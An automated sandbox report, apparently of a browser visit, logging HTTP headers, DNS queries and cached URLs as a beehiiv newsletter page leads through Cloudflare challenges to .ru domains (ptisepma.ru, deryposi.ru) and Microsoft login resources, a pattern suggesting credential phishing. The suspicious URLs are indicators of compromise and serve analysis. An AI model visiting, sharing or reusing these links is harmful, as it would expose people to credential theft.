Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/9027d8d7696df5f4/1736964884740/vBy9sdd_6wtJu9Q HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/lmms8/0x4AAAAAAA3QRJEAC_qJbwdC/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/9027d8d7696df5f4/1736964884740/vBy9sdd_6wtJu9Q HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/651714567:1736962315:3lPN5B_pdHyxu2zN0eNDhYTO4gAiA0k4emvGs5JWIt0/9027d8d7696df5f4/hVY0JGVqC6z_tWMP0OUg_f14hKuDGfg7JBy.BAGNURA-1736964883-1.1.1.1-p2rxPHVRoB.C67YhDTwg_FfpACb1dt5fHlRIgIbMTQFI.0B846ool8wnKkZVvXG8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/651714567:1736962315:3lPN5B_pdHyxu2zN0eNDhYTO4gAiA0k4emvGs5JWIt0/9027d8d7696df5f4/hVY0JGVqC6z_tWMP0OUg_f14hKuDGfg7JBy.BAGNURA-1736964883-1.1.1.1-p2rxPHVRoB.C67YhDTwg_FfpACb1dt5fHlRIgIbMTQFI.0B846ool8wnKkZVvXG8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /gqtSNJAleszsNoxnKlIivCwIdXZAFVCCENEYUPUNAJEFCKPKPVUEGGAEPVBBZAAIHBSVKUFLQAW HTTP/1.1Host: fjuc3ffqsqvx9y7avkadmoheak6kdvhhlnlcmtphukcxpybobixpzqaobm.deryposi.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://2u9o.ptisepma.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://2u9o.ptisepma.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /gqtSNJAleszsNoxnKlIivCwIdXZAFVCCENEYUPUNAJEFCKPKPVUEGGAEPVBBZAAIHBSVKUFLQAW HTTP/1.1Host: fjuc3ffqsqvx9y7avkadmoheak6kdvhhlnlcmtphukcxpybobixpzqaobm.deryposi.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ns?c=d19b4f80-d36c-11ef-b05e-b3c96211093f HTTP/1.1Host: stk.hsprotect.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://msft.hsprotect.netSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://msft.hsprotect.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/v2/msft HTTP/1.1Host: collector-pxzc5j78di.hsprotect.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ns?c=d19b4f80-d36c-11ef-b05e-b3c96211093f HTTP/1.1Host: stk.hsprotect.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/v2/msft HTTP/1.1Host: collector-pxzc5j78di.hsprotect.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: chromecache_283.1.drString found in binary or memory: </style><script async="" id="tiktok-script" src="https://www.tiktok.com/embed.js" type="text/javascript"></script><script async="" defer="" id="twitter-wjs" src="https://platform.twitter.com/widgets.js" type="text/javascript"></script><style> equals www.twitter.com (Twitter)
Source: global trafficDNS traffic detected: DNS query: kanes-newsletter-871ead.beehiiv.com
Source: global trafficDNS traffic detected: DNS query: media.beehiiv.com
Source: global trafficDNS traffic detected: DNS query: beehiiv-adnetwork-production.s3.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: www.tiktok.com
Source: global trafficDNS traffic detected: DNS query: platform.twitter.com
Source: global trafficDNS traffic detected: DNS query: lf16-tiktok-web.tiktokcdn-us.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: syndication.twitter.com
Source: global trafficDNS traffic detected: DNS query: 2u9o.ptisepma.ru
Source: global trafficDNS traffic detected: DNS query: o922922.ingest.us.sentry.io
Source: global trafficDNS traffic detected: DNS query: client.px-cloud.net
Source: global trafficDNS traffic detected: DNS query: embed.bsky.app
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: stk.px-cloud.net
Source: global trafficDNS traffic detected: DNS query: collector-pxebumdlwe.px-cloud.net
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: fjuc3ffqsqvx9y7avkadmoheak6kdvhhlnlcmtphukcxpybobixpzqaobm.deryposi.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: global trafficDNS traffic detected: DNS query: signup.live.com
Source: global trafficDNS traffic detected: DNS query: logincdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: fpt.live.com
Source: global trafficDNS traffic detected: DNS query: msft.hsprotect.net
Source: global trafficDNS traffic detected: DNS query: client.hsprotect.net
Source: global trafficDNS traffic detected: DNS query: stk.hsprotect.net
Source: global trafficDNS traffic detected: DNS query: collector-pxzc5j78di.hsprotect.net
Source: unknownHTTP traffic detected: POST /api/4507170453979136/envelope/?sentry_key=35c3cc890abe9dbb51e6e513fcd6bbca&sentry_version=7&sentry_client=sentry.javascript.remix%2F8.9.2 HTTP/1.1Host: o922922.ingest.us.sentry.ioConnection: keep-aliveContent-Length: 489sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://kanes-newsletter-871ead.beehiiv.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kanes-newsletter-871ead.beehiiv.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 15 Jan 2025 18:14:41 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 18:14:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Age: 4129Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fuobY%2BkOTRAOMABY%2BiqCVr4e5kwUDEDvQXdPymIg%2BRhlb%2Fg8de%2FgL2ItASG%2FOP8OU2jlF3wKIOVMbJ3crCFSeCSFF1Z4rBwdeN42jPAXBjrM%2Fz36lmhyAS3v%2FtW3eA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4925&min_rtt=4916&rtt_var=1400&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2822&recv_bytes=2385&delivery_rate=571428&cwnd=251&unsent_bytes=0&cid=30fb3284c2dc7831&ts=49&x=0"CF-Cache-Status: HITServer: cloudflareCF-RAY: 9027d8ddbbcca314-YULserver-timing: cfL4;desc="?proto=TCP&rtt=17891&min_rtt=17805&rtt_var=6850&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2018&delivery_rate=157863&cwnd=32&unsent_bytes=0&cid=65353cce93fdc680&ts=3608&x=0"
Source: chromecache_290.1.drString found in binary or memory: http://feross.org
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuBWYMZhrib2Bg-4.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuDyYMZhrib2Bg-4.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuDyfMZhrib2Bg-4.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuFuYMZhrib2Bg-4.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuGKYMZhrib2Bg-4.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuI6fMZhrib2Bg-4.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuLyeMZhrib2Bg-4.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuLyfAZlhjQ.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuLyfMZhrib2Bg-4.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuOKfMZhrib2Bg-4.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/librecaslontext/v5/DdT578IGsGw1aF1JU10PUbTvNNaDMfID8sdjNR-8ssPt.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/librecaslontext/v5/DdT678IGsGw1aF1JU10PUbTvNNaDMfq91-dJGxO1q9o.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/librecaslontext/v5/DdT878IGsGw1aF1JU10PUbTvNNaDMcq_3eNrHgO1.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/librecaslontext/v5/DdT878IGsGw1aF1JU10PUbTvNNaDMfq-1-c.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkBgv18G0wx40QDw.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkCEv18G0wx40QDw.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkKEo18G0wx40QDw.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkM0o18G0wx40QDw.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkP8o18G0wx40QDw.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkP8o58C-xw.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/spacemono/v13/i7dMIFZifjKcF5UAWdDRaPpZYFKQHwyVd3U.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/spacemono/v13/i7dNIFZifjKcF5UAWdDRYER8QHi-EwWMbg.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/spacemono/v13/i7dPIFZifjKcF5UAWdDRUEZ2RFq7AwU.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/spacemono/v13/i7dPIFZifjKcF5UAWdDRYEd8QA.ttf
Source: chromecache_292.1.dr, chromecache_343.1.drString found in binary or memory: http://fonts.gstatic.com/s/spacemono/v13/i7dSIFZifjKcF5UAWdDRYERE_FeaGy6QZ3WfYg.ttf
Source: chromecache_293.1.dr, chromecache_292.1.dr, chromecache_284.1.dr, chromecache_343.1.drString found in binary or memory: http://jedwatson.github.io/classnames
Source: chromecache_283.1.drString found in binary or memory: https://2U9O.ptisepma.ru/u2v2j/?utm_source=kanes-newsletter-871ead.beehiiv.com&amp;utm_medium=referr
Source: chromecache_388.1.dr, chromecache_301.1.drString found in binary or memory: https://adnetwork.beehiiv.com
Source: chromecache_358.1.dr, chromecache_224.1.drString found in binary or memory: https://analytics.tiktok.com/i18n/pixel/events.js
Source: chromecache_283.1.drString found in binary or memory: https://beehiiv.com/privacy
Source: chromecache_283.1.drString found in binary or memory: https://beehiiv.com/tou
Source: chromecache_394.1.drString found in binary or memory: https://client.hsprotect.net/PXzC5j78di/main.min.js
Source: chromecache_358.1.dr, chromecache_224.1.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: chromecache_354.1.dr, chromecache_244.1.drString found in binary or memory: https://embed.bsky.app
Source: chromecache_198.1.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuLyfAZ9hiA.woff2)
Source: chromecache_198.1.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuLyfAZBhiI2B.woff2
Source: chromecache_198.1.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuLyfAZFhiI2B.woff2
Source: chromecache_198.1.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuLyfAZJhiI2B.woff2
Source: chromecache_198.1.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuLyfAZNhiI2B.woff2
Source: chromecache_198.1.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuLyfAZthiI2B.woff2
Source: chromecache_198.1.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuLyfAZxhiI2B.woff2
Source: chromecache_380.1.drString found in binary or memory: https://fpt.live.com/
Source: chromecache_310.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/form-control-infrastructure.html#plain-text-form-data
Source: chromecache_388.1.dr, chromecache_301.1.drString found in binary or memory: https://ingestion.apiary.beehiiv.net/api/v1/ingestion/pixel
Source: chromecache_194.1.dr, chromecache_227.1.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_194.1.dr, chromecache_227.1.drString found in binary or memory: https://login.windows-ppe.net
Source: chromecache_283.1.drString found in binary or memory: https://media.beehiiv.com/cdn-cgi/image/fit=scale-down
Source: chromecache_283.1.drString found in binary or memory: https://platform.twitter.com/widgets.js
Source: chromecache_411.1.dr, chromecache_290.1.dr, chromecache_418.1.drString found in binary or memory: https://raw.githubusercontent.com/stefanpenner/es6-promise/master/LICENSE
Source: chromecache_252.1.dr, chromecache_340.1.dr, chromecache_424.1.dr, chromecache_413.1.drString found in binary or memory: https://react.dev/errors/
Source: chromecache_340.1.dr, chromecache_413.1.drString found in binary or memory: https://remix.run/guides/errors
Source: chromecache_340.1.dr, chromecache_413.1.drString found in binary or memory: https://remix.run/route/hydrate-fallback
Source: chromecache_252.1.dr, chromecache_424.1.drString found in binary or memory: https://remix.run/route/meta
Source: chromecache_283.1.drString found in binary or memory: https://www.beehiiv.com/?utm_source=Kane&#x27;s
Source: chromecache_224.1.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=$
Source: chromecache_358.1.dr, chromecache_224.1.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: chromecache_358.1.dr, chromecache_224.1.drString found in binary or memory: https://www.googletagmanager.com/ns.html?id=$
Source: chromecache_283.1.drString found in binary or memory: https://www.tiktok.com/embed.js
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
